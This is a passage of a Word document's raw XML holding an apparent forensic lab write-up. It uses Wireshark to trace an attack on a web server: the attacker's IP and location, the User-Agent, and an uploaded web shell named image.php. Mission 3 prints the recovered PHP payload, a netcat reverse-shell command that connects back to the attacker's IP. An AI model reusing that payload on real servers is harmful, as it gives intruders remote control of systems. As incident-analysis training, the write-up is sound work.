          <w:numId w:val="5"/>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HTTP Response Codes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="3951A98D" w14:textId="598FF25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These fields provided direct evidence of the attacker's actions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="5F9C205D" w14:textId="331AC18D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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Step 6: Following TCP Streams</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="04666905" w14:textId="0FE46132">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Wireshark's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Follow TCP Stream</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feature was used to reconstruct complete HTTP conversations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="45328726" w14:textId="39D9EDE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This allowed viewing of:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="716348CE" w14:textId="7DA0E775">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Uploaded PHP code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="0E4F8888" w14:textId="759A696E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Reverse shell command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="5F4D2DF9" w14:textId="7AADAF39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Server responses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="11C03ED1" w14:textId="5E26137C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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File upload confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="48FA1D32" w14:textId="11339040">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Following the TCP stream made it possible to reconstruct the exact payload delivered by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="285BC73E" w14:textId="0A110818">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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Step 7: IP Geolocation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="27D04CDD" w14:textId="4505E96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suspected attacker IP address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117.11.88.124</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was submitted to an online IP geolocation service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="6F4F5D7E" w14:textId="6FF343FB">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lookup identified the originating city and country.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="50FB9D42" w14:textId="637898B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This information was used to determine the geographical origin of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="49515C71" w14:textId="335A6D97">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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Mission 1 – Geographical Origin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="36C42398" w14:textId="363658B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="6DA9FC70" w14:textId="777550C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Determine the city from which the attack originated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="6A4CD97A" w14:textId="59C4309A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="28332AFA" w14:textId="37AD54EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="3AA9541A" w14:textId="73E7E31B">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attacker IP address was first identified using the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Endpoints</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Conversations</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windows in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="605898A4" w14:textId="660A5A12">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address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117.11.88.124</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consistently initiated communication with the production web server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24.49.63.79</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making it the suspected attacker IP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="6D65EF06" w14:textId="5451E31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IP address was then investigated using an online IP geolocation lookup service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="2BA2A7F7" w14:textId="4C8201D8">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lookup returned the following location:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="213A4C24" w14:textId="432EAD5F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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IP Address: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117.11.88.124</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="1ACB9806" w14:textId="1ED44497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Country: China</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="57591F57" w14:textId="1B7C4D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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City: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Tianjin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="77B395C2" w14:textId="5A3CA138">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="152BEF5B" w:rsidP="34E72B93" w:rsidRDefault="152BEF5B" w14:paraId="302150E5" w14:textId="34A35B20">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="152BEF5B">
        <w:drawing>
          <wp:inline wp14:editId="4786E947" wp14:anchorId="2A96FDE0">
            <wp:extent cx="5943600" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="163804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047208" name="Picture 1638047208"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1659517239">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3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="3A2581BC" w14:textId="57F0C78B">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 xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="00D74DD6">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4</w:t>
      </w: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IP geolocation results showing attacker IP 117.11.88.124 </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located</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in Tianjin, China.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="36FADAC2" w14:textId="26245023">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="06C42754" w14:textId="5D41BE53">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="633810E5" w14:textId="20861D0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network capture clearly indicates that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117.11.88.124</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initiated communication with the production server. Geolocation analysis places this address in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Tianjin, China</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Although IP geolocation cannot conclusively identify the physical attacker because VPNs or proxy services may be used, it provides valuable attribution evidence indicating the apparent origin of the observed traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="47099E65" w14:textId="6D9A953B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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Finding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="536B265B" w14:textId="0687E2F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Geographical Origin:</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Tianjin, China</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="268B2982" w14:textId="2FC651D3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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Mission 2 – User-Agent Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="756E11D3" w14:textId="2B102F32">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="3384A43A" w14:textId="54101CF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Identify the User-Agent used during the attack and determine what it reveals about the attacker's client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="530CF2FC" w14:textId="76F7862C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="55D5160B" w14:textId="7C7C1CC4">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HTTP requests were filtered using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="251EB85B" w14:textId="47EB459A">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http.user_agent</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="04CB736B" w14:textId="6C0B83C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first HTTP GET request was </w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="571657EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>opened,</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and the Hypertext Transfer Protocol section expanded.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="50BC7F68" w14:textId="7A8EC808">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User-Agent field was inspected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="6C0E5E4C" w14:textId="289A0108">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following value was recovered:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="4BDAAFE0" w14:textId="7D4A1353">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Mozilla/5.0 (X11; Linux x86_64; rv:109.0)</w:t>
      </w:r>
      <w:r>
        <w:br/>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Gecko/20100101 Firefox/115.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="370D9C6B" w14:textId="0F5245A3">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4E0E2B4F" w:rsidP="34E72B93" w:rsidRDefault="4E0E2B4F" w14:paraId="7A4B36F3" w14:textId="02EC11FF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="4E0E2B4F">
        <w:drawing>
          <wp:inline wp14:editId="43C99B3E" wp14:anchorId="7A8C60D5">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2088403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403018" name="Picture 2088403018"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId88040819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B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="30BC9836" w14:textId="4C4888F0">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 xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="6F35DBE3">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5</w:t>
      </w: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HTTP request displaying the attacker's User-Agent string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="340C7801" w14:textId="49066F1D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="5E6083DD" w14:textId="25919519">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="7336DFC9" w14:textId="7F2160E0">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User-Agent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indicates</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that the requests originated from a Linux x86_64 operating system using Mozilla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Firefox</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version 115.0. This </w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="5C292A98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>suggests that</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the attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="18A62312">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interact</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with the target using a standard web browser rather than an automated exploitation tool that exposes a distinctive User-Agent. While User-Agent strings can be spoofed, they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remain</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valuable forensic artifacts when reconstructing attacker behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="2207D6C8" w14:textId="2065AAEA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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Finding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="404ADC1D" w14:textId="3D88BD5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User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="520482B1" w14:textId="25B15377">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Mozilla/5.0 (X11; Linux x86_64; rv:109.0)</w:t>
      </w:r>
      <w:r>
        <w:br/>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Gecko/20100101 Firefox/115.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="22999F44" w14:textId="57ACF301">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="3B86DA19" w14:textId="3A2BBF2E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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Mission 3 – Malicious Web Shell Identification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="22DE95E3" w14:textId="1C0D2FAF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="4E81778B" w14:textId="640D38F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Identify the malicious PHP web shell uploaded to the production server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="7AA58ADC" w14:textId="0F72C582">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="1C99B869" w14:textId="68E8C77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HTTP POST requests were isolated using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="78118F24" w14:textId="6C009BA1">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http.request.method == POST</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="68CF4EA9" w14:textId="1518C8D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upload request to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="3C2559B3" w14:textId="1FCD1304">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/reviews/upload.php</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="1E59553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was opened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="4FBC5F78" w14:textId="417DB3D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MIME Multipart Form Data</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section revealed the uploaded file information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="0210F8D5" w14:textId="6C83683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filename field contained:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="2FFADF6E" w14:textId="65798BE6">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image.php</w:t>
      </w:r>
      <w:r>
        <w:br/>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The TCP stream was then reconstructed using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Follow TCP Stream</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revealing the complete contents of the uploaded PHP script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="132FF079" w14:textId="30525B72">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payload contained the following reverse shell command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="7581EF4F" w14:textId="2D783A84">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&lt;?php</w:t>
      </w:r>
      <w:r>
        <w:br/>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system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 117.11.88.124 8080 &gt;/tmp/f");</w:t>
      </w:r>
      <w:r>
        <w:br/>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?&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="7EEEAC6D" w14:textId="7CFB028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This code executes a reverse shell using </w:t>
      </w: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Netcat</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connecting back to the attacker's machine and providing remote command execution on the compromised server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="2ABC4D2B" w14:textId="736F1CBF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="10EB12EF" w:rsidP="34E72B93" w:rsidRDefault="10EB12EF" w14:paraId="62277F86" w14:textId="01041D3D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="10EB12EF">
        <w:drawing>
          <wp:inline wp14:editId="4DF4BFF5" wp14:anchorId="00586ABB">
            <wp:extent cx="5943600" cy="3305175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="926062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062809" name="Picture 926062809"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1123752482">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3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="3CBAB399" w14:textId="6B5E6E5E">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 xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="64718F60">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6</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="3B82F8ED">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HTTP multipart upload showing the malicious file </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image.php</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="3B82F8ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="4BCB27AD" w14:textId="24B43FA5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="42E72F95" w14:textId="72C906C2">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The uploaded file was disguised with a simple name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image.php</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but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contained</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executable PHP code that launched a reverse shell. Once executed, it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attempted</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to connect back to the </w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="6FF2B5F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacker</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host on a designated port using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Netcat</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allowing the attacker to gain remote shell access to the server. This confirms that the uploaded file functioned as a malicious web shell rather than a legitimate image or application file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="6723F114" w14:textId="39668E57">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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Finding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="462D6B7F" w14:textId="08B8407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3B82F8ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Malicious Web Shell:</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4E72B93" w:rsidR="3B82F8ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>image.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="0F096485" w14:textId="54BE6C3C">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Mission 4 – Upload Directory Identification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="09BEBC01" w14:textId="543E04F9">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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="2DAD458F" w14:textId="212662B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Determine the directory on the compromised web server that was used to store uploaded files.</w:t>
      </w:r>
    </w:p>
